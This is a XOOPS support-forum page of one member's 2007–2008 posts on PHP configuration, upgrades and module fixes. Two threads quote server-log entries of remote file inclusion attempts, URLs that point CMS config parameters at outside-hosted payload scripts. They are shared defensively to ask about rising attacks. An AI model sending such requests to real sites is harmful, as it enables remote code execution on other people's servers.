Support Forums - All Posts - XOOPS Web Application System

91

Re: protector without htaccess (how secure is XOOPS???)

2008/4/24 0:53
peterr
Just can't stay away
Posts: 518
Since: 2004/8/5 9

Quote:

I think you need to have a copy of the php.ini file in every directory that contains a PHP script that can be run by HTTP request, and those individual php.ini files only need contain the settings that are specific to that directory.

I might be wrong about this; I don't have a server with that configuration to test.

Dave, I have had to check this out in the past, and ..

1. Yes, you do need to have a copy of the php.ini file in every directory that contains a PHP script that can be run by HTTP request. That php.ini file needs to be a full and complete copy of the php.ini that is used for php config. now, plus the modifications needed.

2. I found that just having a php.ini file containing only the settings that are specific for a particular directory, did not work, as it only overrides those few settings, and leaves all other php settings as the default values.

NO to the Microsoft Office format as an ISO standard.
Sign the petition

92

Re: Increase in attempted exploits

2008/4/24 0:36
peterr
Just can't stay away
Posts: 518
Since: 2004/8/5 9

There is one pattern of a lot of exploits, and it is this as part of the uri

Quote:

.....mosConfig_absolute_path=.....

Apparently, that is related to Mambo exploits, so I did a google search on the site, and looked for 'mambo' , and sure enough, there is one page that has Mambo described in it.

So, no doubt the huge increase in exploits is because the attempted exploiters think the website is running Mambo.

I'll remove that page, and then see if there is a decrease; it may take several weeks before the Google cache is updated of course.

NO to the Microsoft Office format as an ISO standard.
Sign the petition

93

Apache2, php5 and internal server errors

2008/4/22 5:15
peterr
Just can't stay away
Posts: 518
Since: 2004/8/5 9

Just starting to shift an XOOPS site, to an Apache2 and php5 configured server. I have always used the 'php_flag' setings in .htaccess , as modules like protector, and other XOOPS security settings, need the php settings changed.

On the new server, getting a 500 error on .htaccess

Quote:

Invalid command 'php_flag', perhaps mis-spelled or defined by a module not included in the server configuration

I noticed a few posts on various sites stating the following:

Quote:

adding php_flag in .htaccess under apache 2 will cause internal server error. according to apache 2 manual, php_flag should go to <virtual> or <directory> section.

I will have to find out if the new server is running phpsuexec or not, as This FAQ states that with phpsuexec, one cannot use .htaccess to modify php settings.

However, I think the reason for the problem is Apache2 somehow.

Has anyone else had this sort of problem, and if I currently have the following in .htaccess


# XOOPS security measures

php_flag session.use_trans_sid off

# Protector module

php_flag register_globals off

php_flag allow_url_fopen off

and phpsuexec is not running on the new server, do I use the <virtual> or <directory> section, to modify the settings.

NO to the Microsoft Office format as an ISO standard.
Sign the petition

94

Re: Increase in attempted exploits

2008/4/17 6:57
peterr
Just can't stay away
Posts: 518
Since: 2004/8/5 9

Quote:

Somebody is clearly trying to break in. I hope you have your XOOPS Protector module up and running. Many of these hits may be random, but they clearly try to deliver a payload, and you can actually see it if you call up the txt files the hacker wants to execute on your server. Those are scripts that sniff out vulnerabilities in the servers setup and try to get shell access.

Yes, I use Protector, I wouldn't use XOOPS without it. Yep, lots of the text files have 'passthru' and other commands in them, clearly malicious activity, which I'd expect, but it has risen so much, I'm wondering if there is a new XOOPS exploit that people know about, and they are giving the site a hammering.

Fortunately, the server is configured to return a 403 on most of these, or a 404.

Quite a lot of these entries have 'database.php' in them, that's why I was wondering if there is a new expoit, but as yet unknown to a lot of people. Found one athttp://www.milw0rm.com/exploits/2623 , but it is dated Oct 2006, a long time ago.

Quote:

Where are these log entries from, anyway? They look funky.

Coming from many different IP addresses. Hmm, look funky, not too sure what you mean there ?? Oh, the domain name has been changed, for obvious security reasons, we don't want people actually trying it.

Quote:

If you have a lot of time to spare, you can contact the webhosts from which these scripts are served and tell them that some of their users are making nonsense. But then, that's a fight against windmills.

In the past, I sometimes used to actually look up the IP and contact the person/s concerned, and CC in their ISP, but that was when there were only a few a day. Much of that contact resulted in either the person having their account suspended or terminated, or other action. Most hosts appreciated being contacted. Also, as you mention, contact the 'source' from where the scripts are served, yes, did that in the past, in a lot of cases, it resulted in the file being removed. But some sort of automatted system would be better.

Quote:

You can also send a sample to your own webhost and ask them for guidance, and to make sure that the servers are configured correctly.

The host I use has it all tied down fairly well, but the 403 messages have now changed to 404's, so I'll ask why the server change.

Quote:

*edit* But probably, you don't want to have to do with those tugzip folks. So forget the suggestion with contacting them. In any case, make sure you don't use the Internet Explorer if you want to look around what's going on there.

Yes, I don't use IE, Firefox for me.

NO to the Microsoft Office format as an ISO standard.
Sign the petition

95

Increase in attempyed exploits

2008/4/16 11:53
peterr
Just can't stay away
Posts: 518
Since: 2004/8/5 9

Just wondering if any other XOOPS users are noticing a significant increase in the number of exploits on their site ?

The type of activity that has increased is of this nature:

Quote:

www.example.com/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.tugzip.com/files/xpl/test.txt???

www.example.com/modules/xhld0//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.nameserver11.net/billing2/include/html/test.txt?

www.example.com//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.nameserver11.net/billing2/include/html/test.txt?

www.example.com/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.nameserver11.net/billing2/include/html/test.txt?

www.example.com/modules/xhld0/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.nameserver11.net/billing2/include/html/test.txt?

www.example.com/modules/xhld0/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.tugzip.com/files/xpl/test.txt???

I have checked the site athttp://www.milw0rm.com/ , and searched for 'XOOPS', to see if there are any new vulnerabilities, but cannot see anything significant.

The number of attempted exploits has gone from about 3 or 4 a day to 90 or so, quite a rise.

Maybe it's just a case of more people with nothing better to do ??

NO to the Microsoft Office format as an ISO standard.
Sign the petition

96

Re: php5/mysql5

2008/1/4 10:55
peterr
Just can't stay away
Posts: 518
Since: 2004/8/5 9

I notice that XOOPS is not on the list of Software projects committed to using PHP 5.2 or greater. | GoPHP5.org

NO to the Microsoft Office format as an ISO standard.
Sign the petition

97

Upgrade from 2.0.16 ==> 2.0.17.1

2007/11/2 11:52
peterr
Just can't stay away
Posts: 518
Since: 2004/8/5 9

Upgrade went without any problems, but I was mystified why XOOPS thought I was running 2.0.15

In the ../upgrade part, I had to upgrade from 2.0.15 to 2.0.16 and then upgrade to 2.0.17.1 ??

Also, when comparing vers 2.0.16 to 2.0.17.1, there were 2 files in 2.0.16 that are not in 2.0.17.1

Quote:

\class\smarty\plugins\function.assign.php
\class\smarty\plugins\function.xoops_link.php

I assume I can delete these 2 files ?

Peter

NO to the Microsoft Office format as an ISO standard.
Sign the petition

98

WF-Links - displaying comments

2007/9/28 5:52
peterr
Just can't stay away
Posts: 518
Since: 2004/8/5 9

The comments in wf-links are displayed, regardless of the XOOPS config setting. Where a module has specified via the configuration, to "disable comments", then the "comment link" should not be displayed (Smartsection only displays the comments if they are enabled, I think ??) in the /modules/wflinks/singlelink.php

I haven't tested this modification, but it appears that it would only take 3 lines to add, as follows:

1. In /modules/wflinks/include/linkloadinfo.php, add this at the end


$link['comment_rules'] = $xoopsModuleConfig[''com_rule''];

2. Line 79 of /modules/wflinks/templates/wflinks_singlelink.html , currently displays the comments, as follows ..


<a href="<{$xoops_url}>/modules/<{$link.module_dir}>/singlelink.php?cid=<{$link.cid}>&lid=<{$link.id}>"><{$smarty.const._COMMENTS}> (<{$link.comments}>)</a>

3. Change this, so that the displaying of the comments are conditional ..


<{if $link.comment_rules > 0}>

  <a href="<{$xoops_url}>/modules/<{$link.module_dir}>/singlelink.php?cid=<{$link.cid}>&lid=<{$link.id}>"><{$smarty.const._COMMENTS}> (<{$link.comments}>)</a> 

<{/if}>

This _should_ work okay.

NO to the Microsoft Office format as an ISO standard.
Sign the petition

99

Re: Calling JMorris!! Bluehue theme "quirk"

2007/9/10 11:31
peterr
Just can't stay away
Posts: 518
Since: 2004/8/5 9

Quote:

wrote:
P.S. I now have a dedicated support forum for my themes and modules at MyWebResource.

I get a 404 on that link ?

NO to the Microsoft Office format as an ISO standard.
Sign the petition

100

Re: Compatibility Forum Newbb with XOOPS 2.0.17 ??

2007/9/6 13:05
peterr
Just can't stay away
Posts: 518
Since: 2004/8/5 9

Yes, that is how the structure is setup (some of those are on different domains, but that is irrelevant).

You are correct about Frameworks, it isn't in the place where you have indicated that it should be, it's like this ..

--africa/
----cache/
----class/
----images/
...
--chile/
----cache/
----class/
----images/
...
--Frameworks/

NO to the Microsoft Office format as an ISO standard.
Sign the petition

Stats
Goal:	$100.00
Due Date:	May 31
Gross Amount:	$0.00
Net Balance:	$0.00
Left to go:	$100.00

Forum Index

Re: protector without htaccess (how secure is XOOPS???)

Re: Increase in attempted exploits

Apache2, php5 and internal server errors

Re: Increase in attempted exploits

Increase in attempyed exploits

Re: php5/mysql5

Upgrade from 2.0.16 ==> 2.0.17.1

WF-Links - displaying comments

Re: Calling JMorris!! Bluehue theme "quirk"

Re: Compatibility Forum Newbb with XOOPS 2.0.17 ??

Login

Search

Recent Posts

Re: Rebuilding and Updating a 20 years old Xoops Website from 2.0.18? to 2.5.11

Rebuilding and Updating a 20 years old Xoops Website from 2.0.18? to 2.5.11

Re: NewBB v 5.1.0 b 6

Re: NewBB v 5.1.0 b 6

NewBB v 5.1.0 b 6

Re: XOOPS 2.5.11 search user is not working

Re: oledrion

Re: oledrion

Re: oledrion

Re: oledrion

Who's Online

Donat-O-Meter

Latest GitHub Commits

{{ record.sha.slice(0, 7) }} - {{ record.commit.message | truncate }}